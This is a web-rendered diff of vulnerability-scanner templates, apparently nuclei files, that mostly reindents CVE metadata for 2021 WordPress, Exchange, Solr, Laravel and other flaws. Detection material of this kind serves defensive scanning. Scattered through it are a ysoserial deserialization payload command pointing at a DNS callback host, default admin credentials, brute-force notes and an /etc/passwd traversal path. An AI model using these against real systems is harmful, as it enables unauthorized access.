description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
|
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
|
||||||
tags: cve,cve2021,wordpress,wp-plugin,sqli
|
tags: cve,cve2021,wordpress,wp-plugin,sqli
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
|
||||||
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
||||||
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2021,mediumish,xss,wordpress
|
tags: cve,cve2021,mediumish,xss,wordpress
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
|
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
|
||||||
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
|
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2021,wp-plugin,wordpress,xss
|
tags: cve,cve2021,wp-plugin,wordpress,xss
|
||||||
reference:
|
reference:
|
||||||
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
|
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
|
||||||
- https://wordpress.org/plugins/marmoset-viewer/#developers
|
- https://wordpress.org/plugins/marmoset-viewer/#developers
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
reference: https://paper.seebug.org/1476/
|
reference: https://paper.seebug.org/1476/
|
||||||
description: |
|
description: |
|
||||||
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
|
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
|
||||||
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
|
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
|
||||||
tags: cve,cve2021,apache,rce
|
tags: cve,cve2021,apache,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -10,9 +10,9 @@ info:
|
||||||
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
|
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
|
||||||
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
|
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
|
||||||
|
|
||||||
# Note:- This is detection template, To perform deserializes do as below
|
# Note:- This is detection template, To perform deserializes do as below
|
||||||
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
|
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
|
||||||
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
|
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2021,moodle,jitsi,xss
|
tags: cve,cve2021,moodle,jitsi,xss
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
|
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,13 +5,13 @@ info:
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||||
reference:
|
reference:
|
||||||
- https://proxylogon.com/#timeline
|
- https://proxylogon.com/#timeline
|
||||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||||
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
|
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
|
||||||
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
|
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: idealphase
|
author: idealphase
|
||||||
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
|
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
|
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2021,pega,auth-bypass
|
tags: cve,cve2021,pega,auth-bypass
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@ info:
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: critical
|
severity: critical
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
|
||||||
tags: cve,cve2021,apache,tapestry
|
tags: cve,cve2021,apache,tapestry
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,10 +7,10 @@ info:
|
||||||
tags: cve,cve2021,apache,solr,ssrf
|
tags: cve,cve2021,apache,solr,ssrf
|
||||||
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
|
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
|
||||||
reference:
|
reference:
|
||||||
- https://www.anquanke.com/post/id/238201
|
- https://www.anquanke.com/post/id/238201
|
||||||
- https://ubuntu.com/security/CVE-2021-27905
|
- https://ubuntu.com/security/CVE-2021-27905
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
|
||||||
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
|
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
|
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
|
||||||
tags: ntopng,cve,cve2021
|
tags: ntopng,cve,cve2021
|
||||||
reference:
|
reference:
|
||||||
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
|
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
|
||||||
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
|
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
|
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
|
||||||
reference:
|
reference:
|
||||||
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
|
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
tags: hpe,cve,cve2021,bypass
|
tags: hpe,cve,cve2021,bypass
|
||||||
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
|
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2021-15
|
- https://www.tenable.com/security/research/tra-2021-15
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2021,xss,ghost
|
tags: cve,cve2021,xss,ghost
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
|
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
|
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
|
||||||
reference:
|
reference:
|
||||||
- https://www.ambionics.io/blog/laravel-debug-rce
|
- https://www.ambionics.io/blog/laravel-debug-rce
|
||||||
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
|
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
|
||||||
tags: cve,cve2021,laravel,rce
|
tags: cve,cve2021,laravel,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
reference:
|
reference:
|
||||||
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
||||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
||||||
tags: cve,cve2021,expressjs,lfi
|
tags: cve,cve2021,expressjs,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -4,8 +4,8 @@ info:
|
||||||
name: Ansi_up XSS
|
name: Ansi_up XSS
|
||||||
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
|
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
|
||||||
reference:
|
reference:
|
||||||
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
|
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
|
||||||
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: medium
|
severity: medium
|
||||||
|
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: |
|
description: |
|
||||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
|
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
|
||||||
reference:
|
reference:
|
||||||
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
|
||||||
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
|
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
|
||||||
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
|
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
|
||||||
tags: cve,cve2021,ssrf,rce,exchange
|
tags: cve,cve2021,ssrf,rce,exchange
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Finding the Tieline Admin Panels with default credentials.
|
description: Finding the Tieline Admin Panels with default credentials.
|
||||||
reference:
|
reference:
|
||||||
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
|
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
|
||||||
tags: cve,cve2021,tieline,default-login
|
tags: cve,cve2021,tieline,default-login
|
||||||
|
|
||||||
# admin:password
|
# admin:password
|
||||||
|
|
|
@ -7,7 +7,7 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2021,openam,rce,java
|
tags: cve,cve2021,openam,rce,java
|
||||||
reference:
|
reference:
|
||||||
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
|
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -13,7 +13,7 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
body: |
|
||||||
{"username":"admin","password":"123456"}
|
{"username":"admin","password":"123456"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -18,7 +18,7 @@ requests:
|
||||||
gitlab_user:
|
gitlab_user:
|
||||||
- 1234
|
- 1234
|
||||||
- admin
|
- admin
|
||||||
# Enumerate valid user.
|
# Enumerate valid user.
|
||||||
|
|
||||||
attack: clusterbomb
|
attack: clusterbomb
|
||||||
|
|
||||||
|
|
|
@ -9,8 +9,8 @@ info:
|
||||||
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
|
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
|
||||||
- https://github.com/grafana/grafana/issues/14755
|
- https://github.com/grafana/grafana/issues/14755
|
||||||
|
|
||||||
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
|
||||||
# So make sure, not to attempt more than 4 password for same valid user.
|
# So make sure, not to attempt more than 4 password for same valid user.
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
||||||
|
@ -42,7 +42,7 @@ requests:
|
||||||
|
|
||||||
{"user":"admin","password":"§grafana_password§"}
|
{"user":"admin","password":"§grafana_password§"}
|
||||||
|
|
||||||
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
|
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -8,9 +8,9 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
|
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
|
||||||
|
|
||||||
# Update the list with more CNAMEs related to Azure
|
# Update the list with more CNAMEs related to Azure
|
||||||
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
|
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
|
||||||
# Do not report this without claiming the CNAME.
|
# Do not report this without claiming the CNAME.
|
||||||
|
|
||||||
dns:
|
dns:
|
||||||
- name: "{{FQDN}}"
|
- name: "{{FQDN}}"
|
||||||
|
|
|
@ -6,10 +6,10 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: dns,takeover
|
tags: dns,takeover
|
||||||
reference:
|
reference:
|
||||||
- https://securitytrails.com/blog/subdomain-takeover-tips
|
- https://securitytrails.com/blog/subdomain-takeover-tips
|
||||||
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
|
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
|
||||||
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
|
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
|
||||||
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
|
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
|
||||||
|
|
||||||
dns:
|
dns:
|
||||||
- name: "{{FQDN}}"
|
- name: "{{FQDN}}"
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: exposure,api
|
tags: exposure,api
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/dwisiswant0/wadl-dumper
|
- https://github.com/dwisiswant0/wadl-dumper
|
||||||
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
|
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: config,git,exposure
|
tags: config,git,exposure
|
||||||
reference:
|
reference:
|
||||||
- https://twitter.com/pratiky9967/status/1230001391701086208
|
- https://twitter.com/pratiky9967/status/1230001391701086208
|
||||||
- https://www.tenable.com/plugins/was/98595
|
- https://www.tenable.com/plugins/was/98595
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: ELSFA7110
|
author: ELSFA7110
|
||||||
severity: low
|
severity: low
|
||||||
reference:
|
reference:
|
||||||
- https://hackerone.com/reports/761158
|
- https://hackerone.com/reports/761158
|
||||||
- https://hackerone.com/reports/300539
|
- https://hackerone.com/reports/300539
|
||||||
tags: config,exposure,sharepoint
|
tags: config,exposure,sharepoint
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue